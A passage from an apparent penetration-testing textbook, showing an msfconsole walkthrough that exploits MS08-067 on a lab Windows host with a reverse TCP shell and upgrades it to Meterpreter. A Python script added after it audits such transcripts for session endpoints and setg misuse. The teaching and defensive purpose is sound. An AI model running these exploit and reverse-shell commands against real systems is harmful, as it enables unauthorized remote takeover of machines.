Chapter 6
into the network. Let’s look at a quick example from start to finish using
MS08-067 with a reverse command shell as the payload, and upgrade it to a
Meterpreter shell.
root@bt:/opt/framework3/msf3# msfconsole
msf > search ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > setg LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)
. . . SNIP . . .
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044)
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
We issue the setg command for LHOST and LPORT, which is required in order for sessions -u 1 to upgrade the session to Meterpreter. (The setg command sets LPORT and LHOST globally in Metasploit, not just for this exploit.)
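
The following is an added example, not code from the book: a small Python auditor for msfconsole transcripts like the listing above. It records the endpoints of every opened session (so engagement activity can be matched against firewall or IDS logs) and flags a sessions -u issued before LHOST and LPORT were set with setg. The transcript is constructed from the listing; the names audit and REQUIRED are assumptions of this example.

```python
import re

# Constructed sample: commands and session lines taken from the listing above.
TRANSCRIPT = """\
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > setg LHOST 192.168.33.129
msf exploit(ms08_067_netapi) > setg LPORT 8080
msf exploit(ms08_067_netapi) > exploit -z
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
msf exploit(ms08_067_netapi) > sessions -u 1
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044)
"""

PROMPT = re.compile(r"^msf(?: \w+\([^)]*\))? > (.*)$")
OPENED = re.compile(r"\[\*\] (.+?) session (\d+) opened \((\S+):(\d+) -> (\S+):(\d+)\)")
REQUIRED = ("LHOST", "LPORT")  # per the text, these must be global for `sessions -u`

def audit(transcript):
    """Return (sessions, warnings) for an msfconsole transcript."""
    global_opts, sessions, warnings = {}, [], []
    for line in transcript.splitlines():
        # Session notices can be printed after a prompt, so check them first.
        opened = OPENED.search(line)
        if opened:
            kind, sid, lhost, lport, rhost, rport = opened.groups()
            sessions.append({"id": int(sid), "type": kind,
                             "local": (lhost, int(lport)),
                             "remote": (rhost, int(rport))})
            continue
        prompt = PROMPT.match(line)
        if not prompt:
            continue
        words = prompt.group(1).split()
        if len(words) >= 3 and words[0] == "setg":
            # Only setg is tracked: plain `set` stays local to one module.
            global_opts[words[1].upper()] = words[2]
        elif words[:2] == ["sessions", "-u"]:
            missing = [o for o in REQUIRED if o not in global_opts]
            if missing:
                warnings.append(f"sessions -u {' '.join(words[2:])}: "
                                f"{', '.join(missing)} not set with setg")
    return sessions, warnings
```
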